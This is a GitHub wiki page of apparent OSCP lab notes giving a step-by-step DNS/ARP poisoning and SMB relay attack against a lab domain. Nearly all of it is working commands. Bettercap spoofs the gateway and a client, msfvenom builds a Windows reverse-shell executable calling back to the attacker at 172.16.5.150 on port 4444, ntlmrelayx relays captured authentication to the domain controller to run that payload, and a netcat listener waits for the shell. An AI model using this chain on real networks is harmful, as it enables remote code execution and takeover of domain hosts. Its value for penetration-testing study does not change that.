DNS poisoning and SMB relay - oscpname/RELAY_scenarios GitHub Wiki
Tools:
- bettercap
- msfvenom
- ntlmrelayx
IPs
Attacker 172.16.5.150
Gateway 172.16.5.1
Domain Controller 172.16.5.10 (FQDN: dc01.sportsfoo.com)
Some client host 172.16.5.30
- set up bettercap for ARP/DNS spoofing
172.16.5.0/24 > 172.16.5.150 » set dns.spoof.address 172.16.5.150
172.16.5.0/24 > 172.16.5.150 » set dns.spoof.domains sportsfoo.com
172.16.5.0/24 > 172.16.5.150 » get dns.spoof*
dns.spoof.address: '172.16.5.150'
dns.spoof.all: 'false'
dns.spoof.domains: 'sportsfoo.com'
dns.spoof.hosts: ''
172.16.5.0/24 > 172.16.5.150 » set arp.spoof.targets 172.16.5.1, 172.16.5.30
172.16.5.0/24 > 172.16.5.150 » set arp.spoof.internal true
172.16.5.0/24 > 172.16.5.150 » get arp*
arp.spoof.internal: 'true'
arp.spoof.targets: '172.16.5.1, 172.16.5.30'
arp.spoof.whitelist: ''
- msfvenom to generate the payload
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=172.16.5.150 LPORT=4444 -f exe -o payload.exe
- run ntlmrelayx.py
ntlmrelayx.py -t 172.16.5.10 -e payload.exe
- prepare listener and activate spoofing
nc -nlvp 4444
dns.spoof on
arp.spoof on